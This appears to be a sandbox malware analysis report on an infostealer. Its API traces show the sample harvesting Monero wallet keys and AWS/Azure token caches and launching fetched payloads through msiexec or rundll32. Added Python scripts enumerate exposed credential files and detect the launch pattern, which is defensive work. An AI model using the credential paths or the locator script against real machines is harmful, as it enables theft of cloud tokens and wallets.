                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,014CD408,00000000,?,007B144C,00000000,?,?), ref: 0079CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0079CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0079CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0079CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0079CAD9
                              • StrStrA.SHLWAPI(?,014CD498,007B0B52), ref: 0079CAF7
                              • StrStrA.SHLWAPI(00000000,014CD420), ref: 0079CB1E
                              • StrStrA.SHLWAPI(?,014CD860,00000000,?,007B1458,00000000,?,00000000,00000000,?,014C8F80,00000000,?,007B1454,00000000,?), ref: 0079CCA2
                              • StrStrA.SHLWAPI(00000000,014CD620), ref: 0079CCB9
                                • Part of subcall function 0079C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0079C871
                                • Part of subcall function 0079C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0079C87C
                              • StrStrA.SHLWAPI(?,014CD620,00000000,?,007B145C,00000000,?,00000000,014C9030), ref: 0079CD5A
                              • StrStrA.SHLWAPI(00000000,014C90A0), ref: 0079CD71
                                • Part of subcall function 0079C820: lstrcat.KERNEL32(?,007B0B46), ref: 0079C943
                                • Part of subcall function 0079C820: lstrcat.KERNEL32(?,007B0B47), ref: 0079C957
                                • Part of subcall function 0079C820: lstrcat.KERNEL32(?,007B0B4E), ref: 0079C978
                              • lstrlen.KERNEL32(00000000), ref: 0079CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0079CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 87e2060f3e003d6102a56d98fed659387b39c1a5321af1fe8437a866b18830fb
                              • Instruction ID: 68525decd3adc6add0c316ac107029cee88145c44300a4c075cbff89d39b3d8f
                              • Opcode Fuzzy Hash: 87e2060f3e003d6102a56d98fed659387b39c1a5321af1fe8437a866b18830fb
                              • Instruction Fuzzy Hash: 29E1FD71D10108FFDB55EBA0DC9AFEEB778AF55300F404269F10666191EF386A4ACB62
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • RegOpenKeyExA.ADVAPI32(00000000,014CB6E8,00000000,00020019,00000000,007B05B6), ref: 007A83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007A8426
                              • wsprintfA.USER32 ref: 007A8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007A847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 007A8499
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: bc8387be94bbbb303defb63d5c39ec4954c5b643289ccb74941452d92a93ca0c
                              • Instruction ID: 2c2633d52ae50329ca1b7da55fffb28a7492d78cfdb643a8a02a58035e04e01c
                              • Opcode Fuzzy Hash: bc8387be94bbbb303defb63d5c39ec4954c5b643289ccb74941452d92a93ca0c
                              • Instruction Fuzzy Hash: FA811DB1951118EBEB64DB50CC95FEAB7B8FF48700F008299E10AA6141DF796B85CF91
                              APIs
                                • Part of subcall function 007A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007A8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 007A4DCD
                                • Part of subcall function 007A4910: wsprintfA.USER32 ref: 007A492C
                                • Part of subcall function 007A4910: FindFirstFileA.KERNEL32(?,?), ref: 007A4943
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 007A4E59
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B0FDC), ref: 007A4971
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B0FE0), ref: 007A4987
                                • Part of subcall function 007A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 007A4B7D
                                • Part of subcall function 007A4910: FindClose.KERNEL32(000000FF), ref: 007A4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 007A4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007A4EE5
                                • Part of subcall function 007A4910: wsprintfA.USER32 ref: 007A49B0
                                • Part of subcall function 007A4910: StrCmpCA.SHLWAPI(?,007B08D2), ref: 007A49C5
                                • Part of subcall function 007A4910: wsprintfA.USER32 ref: 007A49E2
                                • Part of subcall function 007A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 007A4A1E
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,014CE9C8), ref: 007A4A4A
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,007B0FF8), ref: 007A4A5C
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,?), ref: 007A4A70
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,007B0FFC), ref: 007A4A82
                                • Part of subcall function 007A4910: lstrcat.KERNEL32(?,?), ref: 007A4A96
                                • Part of subcall function 007A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 007A4AAC
                                • Part of subcall function 007A4910: DeleteFileA.KERNEL32(?), ref: 007A4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: c78c6872ff390e3e2402c8f35d5ca21965b12281183ff0277c24ae01d4353bc3
                              • Instruction ID: c31ff7daf3b632e74dd0c9077bf1e116037408c85e42977cf189c77d30df105d
                              • Opcode Fuzzy Hash: c78c6872ff390e3e2402c8f35d5ca21965b12281183ff0277c24ae01d4353bc3
                              • Instruction Fuzzy Hash: 5241B6B9A50208A7DB50F770EC5BFED3338AB65700F804594B545660C1EEB85BD8CB93
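The record above is the sample's cloud-credential collection loop: SHGetFolderPathA resolves a base folder (CSIDL 0x1C, CSIDL_LOCAL_APPDATA), lstrcat appends \.azure\, \.aws\ and \.IdentityService\, FindFirstFileA/FindNextFileA walk each directory with the mask *.*, the two StrCmpCA calls skip the "." and ".." entries, PathMatchSpecA filters the names, and CopyFileA stages each hit under an Azure\... label in the loot set (the String IDs list msal.cache, the MSAL token cache, explicitly). The script below is an added example for this report, not code from the sample or from Joe Sandbox: it applies the same directory names, mask and skip rules to a user profile and lists what such a collector would take, without copying anything. The single base folder, the depth limit, and the high-value file names other than msal.cache (credentials and msal_token_cache.bin, taken from AWS and Azure CLI documentation) are assumptions of the example, as is the constructed sample profile it builds for a dry run.

```python
import fnmatch
import os
import tempfile
from pathlib import Path

# Directory names appended with lstrcat, and the archive label the sample
# uses for each (both taken from the String IDs of the record).
TARGET_DIRS = {
    ".azure": r"Azure\.azure",
    ".aws": r"Azure\.aws",
    ".IdentityService": r"Azure\.IdentityService",
}
FILE_MASK = "*.*"  # mask passed to FindFirstFileA / PathMatchSpecA in the record

# Files that hold reusable tokens. msal.cache is named in the record; the other
# names come from AWS/Azure CLI documentation (assumption for this example).
HIGH_VALUE = {"msal.cache", "credentials", "msal_token_cache.bin", "accesstokens.json"}


def path_match_spec(name: str, mask: str) -> bool:
    """Approximation of PathMatchSpecA: case-insensitive '*' and '?' wildcards.
    PathMatchSpecA treats '*.*' as 'everything', including names without a dot."""
    if mask == "*.*":
        return True
    return fnmatch.fnmatchcase(name.lower(), mask.lower())


def collect_exposed_files(base_dir: str, max_depth: int = 3) -> list:
    """Return (archive_label, source_path) pairs a collector with these rules
    would stage. base_dir stands in for the SHGetFolderPathA result; the record
    shows one CSIDL argument, so one base folder is assumed for all three dirs."""
    found = []
    for dir_name, label in TARGET_DIRS.items():
        root = Path(base_dir) / dir_name
        if not root.is_dir():
            continue
        for dirpath, dirnames, filenames in os.walk(root):
            depth = len(Path(dirpath).relative_to(root).parts)
            if depth >= max_depth:
                dirnames[:] = []          # do not descend any further
            for fn in sorted(filenames):  # FindNextFileA order is filesystem-defined; sorted for determinism
                if fn in (".", ".."):     # the two StrCmpCA checks in the loop (os.walk never yields them)
                    continue
                if not path_match_spec(fn, FILE_MASK):
                    continue
                src = Path(dirpath) / fn
                rel = str(src.relative_to(root)).replace("/", "\\")
                found.append((label + "\\" + rel, str(src)))
    return found


def highlight_high_value(entries: list) -> list:
    """Subset of entries whose file name is a known token store."""
    return [e for e in entries if Path(e[1]).name.lower() in HIGH_VALUE]


def build_sample_profile() -> str:
    """Constructed sample profile for a dry run; contents are placeholders,
    not real credentials."""
    base = tempfile.mkdtemp(prefix="profile_")
    files = {
        ".aws/credentials": "[default]\naws_access_key_id = PLACEHOLDER\n",
        ".aws/config": "[default]\nregion = eu-west-1\n",
        ".azure/msal_token_cache.bin": "placeholder",
        ".azure/logs/telemetry.txt": "noise",
        ".IdentityService/msal.cache": "placeholder",
    }
    for rel, content in files.items():
        p = Path(base) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    return base


if __name__ == "__main__":
    profile = build_sample_profile()
    entries = collect_exposed_files(profile)
    for label, src in entries:
        print(f"{label:45} <- {src}")
    print("high value:", [Path(s).name for _, s in highlight_high_value(entries)])
```

Run it against a real profile by passing the profile directory (on Windows, the folder SHGetFolderPathA would return) to collect_exposed_files; anything highlight_high_value returns is a token that leaves the host with the rest of the loot the moment this sample runs as that user, so those are the credentials to rotate first after an infection.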
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007A906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 06e85eb33f6953bfcc855a283166a297381c32901f279f2f891184cdb2d6653c
                              • Instruction ID: e44970cbc436f0fbf676dbed86ff31f42f30b115f9cfe17230acff13568bf28d
                              • Opcode Fuzzy Hash: 06e85eb33f6953bfcc855a283166a297381c32901f279f2f891184cdb2d6653c
                              • Instruction Fuzzy Hash: E6710075950208EBDB04DFE4DD89FEEB7B8BF88300F108509F615A7290DB38A955DB61
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 007A34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: c64ad97e35d7c33272a3173b0133a0e862e89202facc93e53c5584a1fa246863
                              • Instruction ID: a314a0913b3f2c695eb11d685b59684db7a7dcf92efd17faf0c7e5ea22dde3dd
                              • Opcode Fuzzy Hash: c64ad97e35d7c33272a3173b0133a0e862e89202facc93e53c5584a1fa246863
                              • Instruction Fuzzy Hash: 8012F171810108EADB45EBA0DC96FEEB778AF95300F504269F50766191EF3C6B4ACF92
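The three ShellExecuteEx calls in this record (cbSize 0x3C, the size of SHELLEXECUTEINFOA on 32-bit) together with its String IDs (/i ", /passive, .msi, .dll, C:\Windows\system32\msiexec.exe, C:\Windows\system32\rundll32.exe) describe how a fetched payload is launched: an .msi through msiexec /i "<path>" /passive, a .dll through rundll32, anything else directly. The detection below is an added example written for this report, not part of the report or of any product rule set. It scores process-creation records (Sysmon Event ID 1 style fields image, cmdline, parent_image) for that launch pattern: the child is msiexec or rundll32, the package or DLL sits in a user-writable directory, a silent install flag is present, and the parent itself runs from a user-writable directory. The list of user-writable locations, the point values, the alert threshold and the four sample records are constructed for the example and need tuning per estate.

```python
import re

# Locations a standard user can write to; both the payload path and the parent
# image are checked against this list (assumption for the example).
USER_WRITABLE = re.compile(
    r"^(?:[A-Z]:\\Users\\[^\\]+\\(?:AppData\\Local\\Temp|AppData\\Roaming|Downloads|Desktop)"
    r"|[A-Z]:\\ProgramData|[A-Z]:\\Windows\\Temp|[A-Z]:\\Temp)\\",
    re.IGNORECASE,
)
SILENT_FLAGS = {"/passive", "/qn", "/quiet", "/q", "/qb"}  # /passive is the one in the record
ARG_RE = re.compile(r'"([^"]*)"|(\S+)')


def split_args(cmdline: str) -> list:
    """Windows-style split: quoted segments stay together, the quotes are dropped."""
    return [quoted or bare for quoted, bare in ARG_RE.findall(cmdline)]


def in_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.match(path))


def score_event(ev: dict) -> tuple:
    """Score one process-creation record {image, cmdline, parent_image}.
    Returns (score, reasons); alert() applies the threshold."""
    image = ev.get("image", "").lower()
    args = split_args(ev.get("cmdline", ""))
    hits, payload = [], None

    if image.endswith("\\msiexec.exe"):
        # msiexec /i "<pkg>" /passive : the form the record's strings build
        flags = {a.lower() for a in args[1:] if a.startswith("/")}
        for i, a in enumerate(args[1:], start=1):
            if a.lower() == "/i" and i + 1 < len(args):
                payload = args[i + 1]
        if payload and payload.lower().endswith(".msi"):
            hits.append((1, "msiexec installing an .msi"))
        if flags & SILENT_FLAGS:
            hits.append((1, "silent/passive install flag"))
    elif image.endswith("\\rundll32.exe") and len(args) > 1:
        # rundll32 <dll>[,<export>] : the DLL path is the first argument
        payload = args[1].split(",", 1)[0]
        if payload.lower().endswith(".dll"):
            hits.append((1, "rundll32 loading a DLL by path"))

    if payload and in_user_writable(payload):
        hits.append((2, "payload in user-writable directory"))
    if in_user_writable(ev.get("parent_image", "")):
        hits.append((2, "parent runs from user-writable directory"))
    return sum(p for p, _ in hits), [why for _, why in hits]


def alert(ev: dict, threshold: int = 4) -> bool:
    """True when the record looks like a dropper launching its payload. At 4 an
    interactive install of a downloaded .msi from Explorer (score 3) stays below
    the line; add /passive or a Temp-resident parent and it trips."""
    return score_event(ev)[0] >= threshold


# Constructed sample records for the example (not taken from the report).
SAMPLE_EVENTS = [
    {   # dropper in Temp launching a fetched .msi the way the record does
        "image": r"C:\Windows\system32\msiexec.exe",
        "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\victim\AppData\Local\Temp\7f3a.msi" /passive',
        "parent_image": r"C:\Users\victim\AppData\Local\Temp\file.exe",
    },
    {   # same dropper launching a fetched .dll through rundll32
        "image": r"C:\Windows\system32\rundll32.exe",
        "cmdline": r"C:\Windows\system32\rundll32.exe C:\ProgramData\up.dll,Start",
        "parent_image": r"C:\Users\victim\AppData\Local\Temp\file.exe",
    },
    {   # benign: user double-clicks a downloaded installer in Explorer
        "image": r"C:\Windows\system32\msiexec.exe",
        "cmdline": r'C:\Windows\system32\msiexec.exe /i "C:\Users\alice\Downloads\7z2301.msi"',
        "parent_image": r"C:\Windows\explorer.exe",
    },
    {   # benign: Control Panel applet via a system DLL
        "image": r"C:\Windows\system32\rundll32.exe",
        "cmdline": r"C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL",
        "parent_image": r"C:\Windows\explorer.exe",
    },
]


if __name__ == "__main__":
    for idx, ev in enumerate(SAMPLE_EVENTS):
        score, reasons = score_event(ev)
        print(f"[{'ALERT' if alert(ev) else 'ok   '}] #{idx} score={score} {reasons}")
```

The parent-image check carries the most weight on purpose: msiexec and rundll32 are signed system binaries that appear constantly in normal telemetry, so the discriminating fact in this record is not the child but that the launcher is an executable living in %TEMP%, which is where a sample named file.exe has just been dropped.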
                              APIs
                                • Part of subcall function 007AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 007AA7E6
                                • Part of subcall function 00796280: InternetOpenA.WININET(007B0DFE,00000001,00000000,00000000,00000000), ref: 007962E1
                                • Part of subcall function 00796280: StrCmpCA.SHLWAPI(?,014CEA08), ref: 00796303
                                • Part of subcall function 00796280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00796335
                                • Part of subcall function 00796280: HttpOpenRequestA.WININET(00000000,GET,?,014CE3D0,00000000,00000000,00400100,00000000), ref: 00796385
                                • Part of subcall function 00796280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007963BF
                                • Part of subcall function 00796280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007963D1
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007A5318
                              • lstrlen.KERNEL32(00000000), ref: 007A532F
                                • Part of subcall function 007A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007A8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 007A5364
                              • lstrlen.KERNEL32(00000000), ref: 007A5383
                              • lstrlen.KERNEL32(00000000), ref: 007A53AE
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 9b09f9008586b16d669206ba677cff88b4d878d3169619957ea4fe4f24f783dc
                              • Instruction ID: 108d78daf797993fc5e4e4d20548dce840c24decb29f8686bf1d4d932b929f4c
                              • Opcode Fuzzy Hash: 9b09f9008586b16d669206ba677cff88b4d878d3169619957ea4fe4f24f783dc
                              • Instruction Fuzzy Hash: E5511E70910148EBCB54FF60CD9AAEE7779AF92301F904228F4075A591EF3C6B56CB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
